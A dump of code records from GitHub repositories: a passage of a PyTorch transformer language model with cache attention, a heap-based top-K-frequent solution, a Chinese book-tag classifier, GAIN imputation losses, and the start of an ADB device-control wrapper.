torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qu, nei_k))\n # nei_BD = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qv, rel_nei))\n # \n # AC_cache, AC_inp = AC.split([cache_num, 1], dim=1)\n # BD_cache, BD_inp = BD.split([cache_num, 1], dim=1)\n\n # AC = torch.cat((AC_cache.reshape(\n # AC_cache.size(0), -1, batch_size, self.num_head),\n # nei_AC,\n # AC_inp.squeeze(1)), 1)\n # BD = torch.cat((BD_cache.reshape(\n # BD_cache.size(0), -1, batch_size, self.num_head),\n # nei_BD,\n # BD_inp.squeeze(1)), 1)\n \n if inf_ind is None:\n BD = self._rel_shift(BD)\n else:\n valid_len = BD.size(1) - (x_len - 1 - inf_ind)\n BD[:,:valid_len,:,:] = BD.clone()[:,x_len-1-inf_ind:,:,:]\n\n if self.no_pos:\n attn_score = AC\n else:\n attn_score = AC + BD\n attn_score.mul_(self.scale)\n attn_score.mul_(theta)\n attn_score = attn_score.reshape(attn_score.size(0), -1, \n batch_size, self.num_head)\n\n if inf_ind is not None:\n mask = mask[inf_ind].unsqueeze(0)\n #if indice_bool is not None and self.same_length: \n # # Maybe there is a better way than for\n # cache_ones = mask.new_ones(x_len, cache_len)\n # cache_masks = torch.tril(cache_ones, diagonal=-1).split(cache_L, dim=1)\n # same_length_masks = []\n # for b in range(batch_size):\n # indice_m = indice_bool[:, b, :]\n # mini_masks = []\n # for isel, sel in enumerate(indice_m):\n # tiny_masks = []\n # i = 0\n # for s in sel:\n # if s:\n # tiny_masks.append(cache_masks[i])\n # i += 1\n # else:\n # tiny_masks.append(cache_masks[-1])\n # tiny_mask = torch.cat(tiny_masks, dim=1)\n # mini_masks.append(tiny_mask[isel].unsqueeze(0))\n # mini_mask = torch.cat(mini_masks, dim=0)\n # same_length_masks.append(mini_mask.unsqueeze(0))\n # same_length_mask = torch.cat(same_length_masks, dim=0)\n # same_length_mask = same_length_mask.permute(1, 2, 0)\n # same_length_mask = torch.cat((same_length_mask, mask.new_zeros(x_len, \n # mask.size(1) - same_length_mask.size(1),\n # batch_size)),\n # dim=1)\n # mask = same_length_mask + mask\n\n if mask is not None:\n attn_score.masked_fill_(mask[:,:,:,None], -float('inf'))\n\n attn_prob = F.softmax(attn_score, 1)\n attn_prob = self.dropatt(attn_prob)\n attn_matrix = attn_prob.mean((2, 3))\n\n prob_cache, prob_nei, prob_inp = attn_prob.split([cache_len,\n nei_len,\n x_len], dim=1)\n attn_vec = torch.einsum(\"ilbn,lbnd->ibnd\", prob_inp, inp_v)\n\n if nei_len > 0:\n nei_vec = torch.einsum(\"ilbn,lbnd->ibnd\", prob_nei, nei_v)\n attn_vec = attn_vec + nei_vec\n\n if cache_len > 0:\n if weights is not None:\n prob_cache = prob_cache.reshape(prob_cache.size(0), -1, cache_L, \n batch_size, self.num_head)\n prob_cache = torch.einsum(\"ikjbn,ibk->ikjbn\", prob_cache, weights)\n prob_cache = prob_cache.view(prob_cache.size(0), -1, *prob_cache.shape[3:])\n cache_v = cache_v.view(-1, *cache_v.shape[2:])\n cache_vec = torch.einsum(\"ilbn,lbnd->ibnd\", prob_cache, cache_v)\n attn_vec = attn_vec + cache_vec\n \n\n #if cache is None and neighbor_mem is None:\n # attn_vec = torch.einsum(\"ijbn,jbnd->ibnd\", attn_prob, heads_v)\n #else:\n # if neighbor_mem is not None and nei_len > 0:\n # prob_cache, prob_nei, prob_inp = attn_prob.split([cache_len,\n # nei_len,\n # x_len], dim=1)\n # attn_prob = torch.cat((prob_cache, prob_inp), 1)\n # nei_vec = torch.einsum(\"ilbn,lbnd->ibnd\", prob_nei, nei_v)\n\n # if indice_bool is not None: \n # attn_prob = attn_prob.reshape(attn_prob.size(0), -1, x_len,\n # batch_size, self.num_head)\n # if weights is not None:\n # attn_prob = torch.einsum(\"ikjbn,ibk->ikjbn\", attn_prob, weights)\n # attn_prob = attn_prob.view(attn_prob.size(0), -1, *attn_prob.shape[3:])\n # cache_v = cache_v.view(-1, *cache_v.shape[2:])\n # attn_vec = torch.einsum(\"ilbn,lbnd->ibnd\", attn_prob, cache_v)\n # if neighbor_mem is not None and nei_len > 0:\n # attn_vec = attn_vec + nei_vec\n # else:\n # attn_vec = torch.einsum(\"ilbn,lbnd->ibnd\", attn_prob, heads_v)\n # attn_vec = attn_vec + nei_vec\n\n attn_vec = attn_vec.reshape(attn_vec.size(0), batch_size, \n self.num_head * self.d_head)\n\n attn_out = self.lin_o(attn_vec)\n attn_out = self.dropattout(attn_out)\n\n output = self.layer_norm(x + attn_out)\n\n #if indice_bool is not None:\n # if inf_ind is not None:\n # print(\"inf time: %.2f ms\" % ((time.time() - start_time) * 1000))\n # else:\n # print(\"train time: %.2f ms\" % ((time.time() - start_time) * 1000))\n\n return output, attn_matrix\n\n\n\n\n\n\nclass TransformerUnit(nn.Module):\n def __init__(self, num_head, d_model, d_head, d_ff, dropatt, dropwei, dropfor, same_length, no_pos):\n super().__init__()\n\n\n self.attn = LearnableMultiheadSelfAttention(num_head, d_model, d_head, dropatt, \n dropwei, same_length, no_pos)\n\n\n self.pos_ff = PostionwiseFF(d_model, d_ff, dropfor)\n\n def forward(self, inputs, pos_emb, pos_bias_u=None, pos_bias_v=None, mask=None, cache=None, indices=None, weights=None, neighbor_mem=None, inf_ind=None, theta=1.0):\n \n output, attn_matrix = self.attn(inputs, pos_emb, pos_bias_u, pos_bias_v, \n mask=mask, cache=cache, \n indice_bool=indices, \n weights=weights, \n neighbor_mem=neighbor_mem,\n inf_ind=inf_ind,\n theta=theta)\n\n output = self.pos_ff(output)\n\n return output, attn_matrix\n\n\nclass TransformerLM(nn.Module):\n def __init__(self, args, corpus=None):\n super().__init__()\n self.args = deepcopy(args)\n self.batch_size = self.args.batch_size\n\n vocab_size = self.args.vocab_size\n d_embedding = self.args.emsize\n d_model = self.args.nhid\n d_ff = self.args.d_ff\n d_head = self.args.d_head\n num_head = self.args.nhead\n num_layer = self.args.nlayers\n num_steps = self.args.num_steps\n mem_len = self.args.mem_len\n cutoffs = self.args.cutoffs\n div_val = self.args.div_val\n init_std = self.args.init_std\n\n adaptive = self.args.adaptive\n\n \n self.corpus = corpus\n self.demo = self.args.demo\n self.same_length = args.same_length\n self.same_length_query = args.same_length_query\n\n self.theta = self.args.attn_theta\n\n if adaptive:\n self.embedding = AdaptiveEmbedding(vocab_size, d_embedding, d_model, \n cutoffs, div_val=div_val, \n init_std=init_std,\n dropemb=args.dropemb)\n else:\n self.decoder = nn.Linear(d_model, vocab_size, bias=False) \n if args.tied:\n self.embedding = nn.Embedding(vocab_size, \n d_embedding, \n padding_idx=1).from_pretrained(self.decoder.weight)\n self.embedding.weight = self.decoder.weight\n else:\n self.embedding = nn.Embedding(vocab_size, d_embedding, padding_idx=1)\n\n self.pos_emb = PositionalEmbedding(d_model)\n\n self.drophid = LockedDropout(args.drophid)\n self.dropout = LockedDropout(args.dropout)\n self.dropinp = LockedDropout(args.dropinp)\n\n if not args.no_pos and not args.no_pos_bias:\n self.pos_bias_u = nn.Parameter(torch.Tensor(num_head, d_head))\n self.pos_bias_v = nn.Parameter(torch.Tensor(num_head, d_head))\n self.init_weights(init_std)\n else:\n self.pos_bias_u = None\n self.pos_bias_v = None\n\n if args.stat:\n self.select_stat = nn.Parameter(torch.zeros(args.cache_N), \n requires_grad=False)\n self.viz = visdom.Visdom()\n assert self.viz.check_connection()\n\n self.layers = nn.ModuleList()\n\n for i in range(num_layer):\n self.layers.append(TransformerUnit(\n num_head=num_head,\n d_model=d_model,\n d_head=d_head,\n d_ff=d_ff,\n dropatt=args.dropatt,\n dropwei=args.dropwei,\n dropfor=args.dropfor,\n same_length=args.same_length,\n no_pos=args.no_pos))\n\n\n\n def init_weights(self, init_std):\n nn.init.normal_(self.pos_bias_u, 0.0, init_std)\n nn.init.normal_(self.pos_bias_v, 0.0, init_std)\n #if not self.args.adaptive:\n # nn.init.normal_(self.embedding.weight, 0.0, init_std)\n # nn.init.normal_(self.decoder.weight, 0.0, init_std)\n\n def init_hidden(self, batch_size):\n return self.init_memory(batch_size)\n\n def set_batch_size(self, batch_size):\n self.batch_size = batch_size\n\n def init_memory(self, batch_size):\n if self.args.mem_len > 0:\n param = next(self.parameters())\n return torch.empty(self.args.nlayers+1, self.args.mem_len, \n batch_size, self.args.nhid, \n dtype=param.dtype, device=param.device)\n else:\n return None\n\n def forward(self, inputs, cache_info=None, values=None, weights=None, indices=None, words=None, draw=False, neighbor_mem=None, inf_ind=None, inf_blocks=None, padding_idx=1):\n #input shape should be seq_len * bsz or seq_len * bsz * emsize\n\n cache_L = self.args.cache_L\n cache_N = self.args.cache_N\n if inputs.dim() == 2:\n word_emb = self.embedding(inputs)\n seq_len, batch_size = inputs.size()\n else:\n word_emb = inputs\n seq_len, batch_size, _ = inputs.size()\n\n if indices is not None:\n mem_len = values.size(0) * values.size(1)\n values = values.view(values.size(0), values.size(1), -1, \n self.args.nlayers+1, self.args.nhid)\n else:\n mem_len = 0\n #zone_bsz = batch_size\n\n if inf_blocks is not None:\n inf_blocks = inf_blocks.transpose(1, 2)\n\n if neighbor_mem is not None:\n nei_len = neighbor_mem.size(1)\n total_len = seq_len + mem_len + nei_len\n else:\n nei_len = 0\n total_len = seq_len + mem_len\n\n \n\n if indices is not None:\n #pos_seq\n pos_indices = torch.cat((indices, \n (torch.ones_like(indices[0]) * values.size(0)\n ).unsqueeze(0)))\n\n pos_seq = torch.arange(total_len-1, -1, -1.0, device=inputs.device)\n if self.args.merge_shift:\n alpha = self.args.merge_alpha\n if alpha == 1.0:\n alpha -= 1e-10\n pos_shift = pos_seq.new_ones(cache_L) * cache_L * alpha / (1 - alpha)\n pos_pad = pos_seq.new_zeros(total_len - cache_L)\n seq_shift = torch.cat((pos_shift, pos_pad), 0)\n pos_seq += seq_shift\n\n if self.args.real_pos:\n if cache_info is None:\n pos = torch.arange(indices.size(0) - 1, -1, -1, \n dtype=torch.float,\n device=inputs.device)\n pos = pos.expand(batch_size, -1)\n pos.transpose_(0, 1)\n pos_key = pos \n else:\n pos_key = cache_info[:,:,0]\n pos_start = torch.einsum(\"ib,j->bij\", pos_key, \n pos_key.new_ones(cache_L) * cache_L)\n if self.args.farnear:\n pos_start += nei_len\n pos_seq = pos_start + torch.arange(cache_L - 1, -1, -1, \n dtype=pos_key.dtype, \n device=pos_key.device)\n pos_seq = pos_seq.reshape(batch_size, -1)\n if self.args.farnear:\n pos_tail = torch.arange(seq_len + nei_len - 1, -1, -1,\n dtype=pos_key.dtype,\n device=pos_key.device)\n else:\n pos_tail = torch.arange(seq_len - 1, -1, -1,\n dtype=pos_key.dtype,\n device=pos_key.device)\n pos_tail = pos_tail.expand(batch_size, -1)\n pos_seq = torch.cat((pos_seq, pos_tail), dim=1)\n else:\n pos_seq = pos_seq.expand(batch_size, -1)\n\n #one-hot pos_indices\n mem_num = values.size(0)\n indice_len = indices.size(0)\n tfbase = torch.eye(mem_num, device=indices.device)\n indice_bool = torch.index_select(tfbase, 0, indices.reshape(-1))\n indice_bool = indice_bool.view(indice_len, -1, batch_size, mem_num)\n indice_bool = indice_bool.sum(0)\n if self.args.discard_worst:\n # update recalls\n query_len = indice_bool.size(0)\n recall = indice_bool.sum(0).t()\n lengths, pos, recalls, queries = cache_info[:self.args.cache_N].chunk(4, dim=-1)\n recalls += recall.unsqueeze(-1)\n queries += query_len\n\n if self.args.stat:\n stat = indice_bool.sum((0, 1))\n self.select_stat += stat\n self.viz.bar(self.select_stat, win=\"select stat\")\n\n if weights is not None:\n x_len = inputs.size(0) if inf_ind is None else 1\n weights = weights.masked_fill(indice_bool.eq(0), -float(\"inf\"))\n weights = F.softmax(weights, 2) * self.args.cache_k\n \n else:\n pos_seq = torch.arange(total_len-1, -1, -1.0, device=inputs.device)\n pos_seq = pos_seq.expand(batch_size, -1)\n pos_indices = indices\n indice_bool = None\n\n pos_seq = pos_seq.view(batch_size, -1)\n\n # build mask to avoid seeing following words \n\n if indices is None:\n if self.same_length_query:\n all_ones = word_emb.new_ones(seq_len, total_len)\n simple_mask = torch.triu(all_ones, diagonal=1+nei_len)\n mask = simple_mask + torch.tril(all_ones, diagonal=-1)\n else:\n mask = torch.triu(word_emb.new_ones(seq_len, total_len), \n diagonal=1+mem_len+nei_len) \n else:\n if self.same_length:\n all_ones = word_emb.new_ones(seq_len, seq_len + nei_len)\n simple_mask = torch.triu(all_ones, diagonal=1+nei_len)\n mask = simple_mask + torch.tril(all_ones, diagonal=-1)\n mask = torch.cat((mask.new_zeros(seq_len, mem_len), mask), dim=1)\n else:\n mask = torch.triu(word_emb.new_ones(seq_len, total_len), \n diagonal=1+mem_len+nei_len) \n\n mask = mask.bool()[:,:,None]\n\n if self.args.sentence_cache:\n # edit mask according to actual length\n # compute positional embedding\n mask = mask.repeat(1, 1, batch_size)\n\n input_padding = inputs.eq(1)\n nei_padding = padding_hidden([input_padding.new_ones(1, l.int().item(), 1) \n for l in cache_info[cache_N,:,1]])\n nei_padding = nei_padding.squeeze(1).squeeze(-1).t().eq(False)\n\n if indices is None:\n # when computing query\n total_padding = torch.cat((nei_padding, input_padding), dim=0)\n # edit mask\n mask = mask.masked_fill(total_padding[None,:,:], True)\n # a word or padding can at least see itself\n self_mask = torch.diag(torch.ones(seq_len), diagonal=nei_len).to(mask)[:seq_len,:]\n mask = mask.masked_fill(self_mask[:,:,None], False)\n pass\n # no need to edit pos_seq, because there are no padding between nei and input\n else:\n # when computing attention\n cache_padding = padding_hidden([input_padding.new_ones(1, l.int().item(), 1) \n for l in cache_info[:cache_N,:,0].flatten()],\n length=cache_L,\n before=False)\n cache_padding = cache_padding.view(cache_N, batch_size, cache_L).eq(False)\n cache_padding = cache_padding.transpose(1, 2).reshape(cache_N * cache_L, batch_size)\n\n total_padding = torch.cat((cache_padding, nei_padding, input_padding), dim=0)\n # edit mask\n mask = mask.masked_fill(total_padding[None,:,:], True)\n\n # edit pos_seq\n new_pos = []\n for b in range(batch_size):\n cache_pos = torch.cat([torch.arange(cache_info[i,b,1].int().item() + x_len, \n cache_info[i,b,1].int().item() + x_len - cache_L,\n -1) \n for i in range(cache_N)])\n nei_x_pos = torch.arange(x_len + nei_len, 0, -1)\n batch_pos = torch.cat((cache_pos, nei_x_pos))\n \n new_pos.append(batch_pos.unsqueeze(0))\n\n pos_seq = torch.cat(new_pos).to(pos_seq)\n\n\n if self.args.clamp_len > 0:\n pos_seq = pos_seq.clamp(max=self.args.clamp_len)\n pos_emb = self.pos_emb(pos_seq)\n\n pos_emb = self.dropinp(pos_emb)\n core_out = self.dropinp(word_emb)\n \n memory = core_out.clone()\n if inf_ind is None:\n memories = [memory]\n else:\n memories = [memory[inf_ind].unsqueeze(0)]\n core_out = core_out[inf_ind].unsqueeze(0)\n\n if self.demo and weights is not None:\n demo_display = tuple(zip(indice_bool.squeeze(), weights.squeeze()))\n\n for i, layer in enumerate(self.layers):\n #zone_i = None if zones is None else zones[i]\n if indices is None:\n value_i = None\n else:\n value_i = values[:,:,:,i,:]\n\n if neighbor_mem is None:\n neighbor_mem_i = None\n else:\n neighbor_mem_i = neighbor_mem[i]\n\n if inf_blocks is None:\n block_i = None\n else:\n block_i = inf_blocks[i]\n\n if inf_ind is None:\n core_out, attn_matrix = layer(core_out, pos_emb, self.pos_bias_u, \n self.pos_bias_v, \n mask=mask, \n cache=value_i, \n indices=indice_bool, \n weights=weights,\n neighbor_mem=neighbor_mem_i,\n theta=self.theta)\n else:\n block_i[inf_ind] = core_out.squeeze(0)\n core_out, attn_matrix = layer(block_i, pos_emb, self.pos_bias_u, \n self.pos_bias_v, \n mask=mask, \n cache=value_i, \n indices=indice_bool, \n weights=weights,\n neighbor_mem=neighbor_mem_i,\n inf_ind=inf_ind,\n theta=self.theta)\n\n\n if i < len(self.layers) - 1:\n core_out = self.drophid(core_out)\n else:\n core_out = self.dropout(core_out)\n memories.append(core_out)\n\n memories = torch.cat(memories, 0)\n memories = memories.view(self.args.nlayers+1, core_out.size(0), -1, \n self.args.nhid)\n\n if draw:\n attn_map = attn_matrix\n else:\n attn_map = None\n\n if not self.args.adaptive:\n output = self.decoder(core_out)\n output = self.dropout(output)\n else:\n output = core_out\n\n if self.demo and weights is not None:\n id2w = self.corpus.vocabulary.index2word\n words = torch.cat((words.squeeze(), inputs.t()), 0)\n for idis, (ind, weight) in enumerate(demo_display):\n print(\"-\" * 89 + \"\\n\")\n print(\"Current Segment: \", end=\"\")\n for iinp, wd in enumerate(inputs):\n if idis == iinp:\n print(\"\\033[1;32m %s \\033[0m\" % id2w[wd.item()], end=\" \")\n else:\n print(id2w[wd.item()], end=\" \")\n print(\"\\n\")\n for i, wt in enumerate(ind * weight):\n if i + 1 == len(weight):\n continue\n print(\"SEGMENT %s | weight: %.3f\" % (i, wt.item()))\n for wd in words[i].view(-1):\n print(id2w[wd.item()], end=\" \")\n print(\"\\n\")\n return output, memories, (attn_map, demo_display)\n\n\n return output, memories, attn_map\n","repo_name":"xyz961014/longterm","sub_path":"CRTN/layers/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":37880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27220534379","text":"# 692(배열이 문자열로 되어있고 리턴하는 배열값 소팅필요) \n# 347(배열이 정수, 소팅 없음)\n# 문제: 주어진 list 에서 가장 많은 k개의 element를 구하여라.\n\n\n# 해쉬테이블과 힙 자료구조 이용함\n\nfrom typing import List\nimport heapq\n\n\ndef topKFrequent(nums: List[int], k: int) -> List[int]:\n table = {} \n for num in nums:\n count = table.get(num)\n if count is None:\n table[num] = 0 \n table[num] += 1\n \n #heap \n freq_heap = []\n for num, count in table.items():\n heapq.heappush(freq_heap,(count, num))\n if k < len(freq_heap):\n heapq.heappop(freq_heap)\n \n k_freq = []\n while freq_heap:\n count , num = freq_heap[0]\n heapq.heappop(freq_heap)\n k_freq.append(num)\n k_freq.reverse()\n \n return k_freq\n\ntopKFrequent(nums=[1,1,1,1,3,3,3,5,5,2,2,4,6], k=2)\n\n\n\n\n################################################################################\n\n\n\n\n\ndef topKfrequents(nums: List[int], k: int) -> List[int]:\n \n hashTable = {}\n for num in nums: # 해쉬에 각 수의 갯수 넣어주고\n if hashTable.get(num) is None:\n hashTable[num] = 0\n\n hashTable[num] += 1\n\n heap = []\n for num, count in hashTable.items(): # 힙큐는 원소가 들어가서 오름차순으로 정렬됨, 즉 최소힙임\n heapq.heappush(heap, (count, num))\n \n while k < len(heap):\n heapq.heappop(heap) # 가장 많은 k개의 element를 구하면 되기에, k = len(heap)일때 멈춤, 즉 최소값이 팝되니까 남은 거는 k개만 남음\n\n results = []\n while heap: # 해당 수만 새로 배열 만들고 역순으로 정렬해서 리턴, 정렬은 문제가 요구하면 하면 됨\n count, number = heapq.heappop(heap)\n results.append(number)\n\n results.reverse()\n return results\n\ntopKfrequents(nums=[1,1,1,1,3,3,3,5,5,2,2,4,6], k=2)","repo_name":"badoil/algorithms","sub_path":"algo5.hash/hash2.topKfrequent.py","file_name":"hash2.topKfrequent.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"69841341051","text":"literature = {'小说', '外国文学', '文学', '随笔', '中国文学', '经典', '日本文学', '散文', '村上春树', '童话', '诗歌', '杂文', '王小波', '儿童文学', '古典文学',\n '张爱玲', '余华', '名著', '当代文学', '钱钟书', '鲁迅', '外国名著', '诗词', '茨威格', '米兰', '昆德拉', '杜拉斯', '港台'}\n\npopular = {'漫画', '绘本', '推理', '青春', '言情', '科幻', '东野圭吾', '悬疑', '武侠', '奇幻', '韩寒', '日本漫画', '耽美', '亦舒', '三毛', '安妮宝贝', '网络小说',\n '推理小说', '郭敬明', '穿越', '金庸', '轻小说', '阿加莎', '克里斯蒂', '几米', '张小娴', '魔幻', '几米', '青春文学', '科幻小说', '罗琳', '高木直子', '古龙',\n '沧月', '落落', '张悦然', '蔡康永'}\n\nculture = {'历史', '心理学', '哲学', '传记', '文化', '社会学', '艺术', '设计', '政治', '社会', '建筑', '宗教', '电影', '数学', '政治学', '回忆录', '思想',\n '中国历史', '国学', '音乐', '人文', '戏剧', '人物传记', '绘画', '艺术史', '佛教', '军事', '西方哲学', '近代史', '二战', '考古', '自由主义', '美术'}\n\nlife = {'爱情', '旅行', '生活', '成长', '励志', '心理', '摄影', '女性', '职场', '美食', '教育', '游记', '灵修', '健康', '情感', '手工', '养生', '两性',\n '人际关系', '家居', '自助游'}\n\neconomics = {'经济学', '管理', '经济', '金融', '商业', '投资', '营销', '创业', '理财', '广告', '股票', '企业史', '策划'}\n\ntechnology = {'科普', '互联网', '编程', '科学', '交互设计', '用户体验', '算法', '科技', '通信', '交互', '神经网络', '程序'}\n\nlearning = {'学习', '英语', '词汇', '教材', '工具书', '算法', '编程'}\n\nCATEGORIES = {1: literature, 2: popular, 3: culture, 4: life, 5: economics, 6: technology, 7: learning}\n\n\ndef parse_category(tags):\n '''\n\n :param tags:\n :return: a list of ref\n '''\n ret = []\n\n for tag in tags:\n for category_id in CATEGORIES:\n if tag['name'] in CATEGORIES[category_id] and category_id not in ret:\n ret.append(category_id)\n return ret\n\nif __name__ == '__main__':\n data = '''\n\n科普(390504)\t互联网(179122)\t编程(120109)\t科学(88335)\n交互设计(57037)\t用户体验(45272)\t算法(39518)\tweb(19680)\n科技(14229)\tUE(4433)\t通信(4009)\t交互(3857)\nUCD(3407)\t神经网络(1691)\t程序(1093)\n '''\n\n import re\n\n items = re.findall(r\"([\\u4e00-\\u9fa5]+)\", data)\n print(items)\n\n tags =[\n {\n \"count\": 21,\n \"name\": \"工具书\",\n \"title\": \"工具书\"\n },\n {\n \"count\": 17,\n \"name\": \"英语\",\n \"title\": \"英语\"\n },\n {\n \"count\": 11,\n \"name\": \"图解\",\n \"title\": \"图解\"\n },\n {\n \"count\": 10,\n \"name\": \"英语学习\",\n \"title\": \"英语学习\"\n },\n {\n \"count\": 8,\n \"name\": \"英语词典\",\n \"title\": \"英语词典\"\n },\n {\n \"count\": 4,\n \"name\": \"词典\",\n \"title\": \"词典\"\n },\n {\n \"count\": 4,\n \"name\": \"牛津\",\n \"title\": \"牛津\"\n },\n {\n \"count\": 3,\n \"name\": \"英国\",\n \"title\": \"英国\"\n }\n ]\n type(CATEGORIES)\n print(parse_category(tags))\n","repo_name":"HermanZeng/dodo","sub_path":"dodo/util/douban/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"40053346092","text":"\"\"\"\nDESCRIPTION: Generative Adversarial Imputation Networks (GAIN) losses.\nAUTHOR: Pablo Ferri\nDATE: 20/08/2023\n\"\"\"\n\n# MODULES IMPORT\nfrom torch import Tensor, mean, log\n\n# SETTINGS\nalpha = 10\noffset = 1e-8\n\n\n# DISCRIMINATOR LOSS\ndef loss_discriminator(*, real_imputed_probabilities: Tensor, missing_mask: Tensor):\n # Loss calculation\n loss_discriminator_ = -mean(missing_mask * log(real_imputed_probabilities + offset) + (1 - missing_mask) * log(\n 1. - real_imputed_probabilities + offset))\n\n # Output\n return loss_discriminator_\n\n\n# GENERATOR LOSS\ndef loss_generator(*, features_noise_perturbed: Tensor, missing_mask, features_generated: Tensor,\n real_imputed_probabilities: Tensor):\n # Loss calculation\n # classification loss\n loss_generator_classification = -mean((1 - missing_mask) * log(real_imputed_probabilities + offset))\n # reconstruction loss\n loss_generator_reconstruction = mean(\n (features_noise_perturbed * missing_mask - features_generated * missing_mask) ** 2) / mean(missing_mask)\n # combination\n loss_generator_ = loss_generator_classification + alpha * loss_generator_reconstruction\n\n # Output\n return loss_generator_, loss_generator_classification, loss_generator_reconstruction\n","repo_name":"bdslab-upv/extremiss","sub_path":"Imputation/GAIN/lossesgain.py","file_name":"lossesgain.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"10150501784","text":"import sys\n\nsys.path.append(\"../\")\nimport subprocess\nfrom builtins import *\n\nfrom performancetest.core.global_data import logger\n\n\ndef split_cmd(cmds):\n return cmds.split() if isinstance(cmds, str) else list(cmds)\n\n\ndef proc_communicate_timeout(proc, timeout):\n try:\n stdout, stderr = proc.communicate(timeout=timeout)\n except subprocess.TimeoutExpired as e:\n proc.kill()\n stdout, stderr = proc.communicate()\n exp = Exception(\"Command {cmd} timed out after {timeout} seconds: stdout['{stdout}'], \"\n \"stderr['{stderr}']\".format(cmd=proc.args, timeout=e.timeout,\n stdout=stdout, stderr=stderr))\n raise (exp)\n\n return stdout, stderr\n\n\nclass ADB(object):\n def __init__(self, serialno=None, adb_path=None, server_addr=None):\n self.serialno = serialno\n self.adb_path = adb_path or \"adb\"\n self._set_cmd_options(server_addr)\n self.server_addr = server_addr\n\n def _set_cmd_options(self, server_addr=None):\n logger.info(server_addr)\n self.host = server_addr[0] if server_addr[0] else \"127.0.0.1\"\n self.port = server_addr[1] if server_addr[1] else 5037\n self.cmd_options = [self.adb_path]\n if self.host:\n self.cmd_options += ['-H', self.host]\n if self.port:\n self.cmd_options += ['-P', str(self.port)]\n\n def start_shell(self, cmds):\n \"\"\"\n Handle `adb shell` c(s)\n\n Args:\n cmds: adb shell command(s)\n\n Returns:\n None\n\n \"\"\"\n cmds = ['shell'] + split_cmd(cmds)\n return self.start_cmd(cmds)\n\n def start_cmd(self, cmds, device=True, only_args=False):\n \"\"\"\n Start a subprocess with adb command(s)\n\n Args:\n cmds: command(s) to be run\n device: if True, the device serial number must be specified by `-s serialno` argument\n\n Raises:\n RuntimeError: if `device` is True and serialno is not specified\n\n Returns:\n a subprocess\n\n \"\"\"\n if device:\n if not self.serialno:\n raise RuntimeError(\"please set serialno first\")\n cmd_options = self.cmd_options + ['-s', self.serialno]\n else:\n cmd_options = self.cmd_options\n\n cmds = cmd_options + split_cmd(cmds)\n logger.debug(cmds)\n logger.debug(\" \".join(cmds))\n if only_args:\n return cmds\n proc = subprocess.Popen(\n cmds,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n creationflags=0\n )\n return proc\n\n def raw_shell(self, cmds, ensure_unicode=True):\n cmds = ['shell'] + split_cmd(cmds)\n logger.info(\"shell执行命令:{}\".format(str(cmds)))\n out = self.cmd(cmds, ensure_unicode=False)\n return out\n\n def cmd(self, cmds, device=True, ensure_unicode=True, timeout=None):\n proc = self.start_cmd(cmds, device)\n if timeout:\n stdout, stderr = proc_communicate_timeout(proc, timeout)\n else:\n stdout, stderr = proc.communicate()\n logger.error(f\"err msg {stderr}\")\n return stdout\n\n def killpid(self, pid):\n logger.info(\"进入killpid函数\")\n self.raw_shell(\"kill {}\".format(pid))\n logger.info(\"killpid函数执行结束\")\n\n\n# class Tidevice():\n# def __init__(self, serialno=None, tidevice_path=None, device_addr=None):\n# self.serialno = serialno\n# self.tidevice_path = tidevice_path or \"tidevice\"\n# self._set_cmd_options()\n# self.device_addr = device_addr\n# self.mac_ssh = None\n# if platform.system() != \"Darwin\":\n# # 建立ssh连接\n# trans = paramiko.Transport((IOSHOST, IOSPORT))\n# trans.connect(username=IOSUSERNAME, password=IOSPASSWORD)\n# # 将sshclient的对象的transport指定为以上的trans\n# ssh = paramiko.SSHClient()\n# ssh._transport = trans\n# self.mac_ssh = ssh\n# # # 执行命令,和传统方法一样\n# # stdin, stdout, stderr = ssh.exec_command(IOSPYTHON + \" -m tidevice\")\n# # print(stdout.read().decode())\n# # print(stderr.read().decode())\n#\n# def _set_cmd_options(self):\n# if len(self.tidevice_path.split()) > 2:\n# self.cmd_options = self.tidevice_path.split()\n# else:\n# self.cmd_options = [self.tidevice_path]\n#\n# def start_cmd(self, cmds, device=True, only_args=False):\n# \"\"\"\n# Start a subprocess with adb command(s)\n#\n# Args:\n# cmds: command(s) to be run\n# device: if True, the device serial number must be specified by `-s serialno` argument\n#\n# Raises:\n# RuntimeError: if `device` is True and serialno is not specified\n#\n# Returns:\n# a subprocess\n#\n# \"\"\"\n# if device:\n# if not self.serialno:\n# raise RuntimeError(\"please set serialno first\")\n# cmd_options = self.cmd_options + ['-u', self.serialno]\n# else:\n# cmd_options = self.cmd_options\n#\n# cmds = cmd_options + split_cmd(cmds)\n# logger.debug(\"ios cmds:{0}\".format(cmds))\n# logger.debug(\" \".join(cmds))\n# if only_args:\n# return cmds\n# proc = subprocess.Popen(\n# cmds,\n# stdin=subprocess.PIPE,\n# stdout=subprocess.PIPE,\n# stderr=subprocess.PIPE,\n# creationflags=0\n# )\n# return proc\n#\n# def raw_shell(self, cmds, ensure_unicode=True):\n# cmds = split_cmd(cmds)\n# out = self.cmd(cmds, ensure_unicode=False)\n# return out\n#\n# def cmd(self, cmds, device=True, ensure_unicode=True, timeout=None, is_block=True):\n# if platform.system() != \"Darwin\":\n# res_cmd = self.start_cmd(cmds, device, only_args=True)\n# res_cmd = \" \".join(res_cmd)\n# logger.info(\"!ios-cmd: \" + res_cmd)\n# if timeout:\n# stdin, stdout, stderr = self.mac_ssh.exec_command(res_cmd, timeout=timeout)\n# else:\n# stdin, stdout, stderr = self.mac_ssh.exec_command(res_cmd)\n# if is_block:\n# logger.error(f\"ios err msg {stderr.read()}\")\n# return stdout.read()\n# else:\n# return stdout\n# else:\n# proc = self.start_cmd(cmds, device)\n# if timeout:\n# stdout, stderr = proc_communicate_timeout(proc, timeout)\n# else:\n# stdout, stderr = proc.communicate()\n# logger.error(f\"err msg {stderr}\")\n# return stdout\n#\n# def killpid(self, pid):\n# self.raw_shell(\"kill {}\".format(pid))\n#\n# def 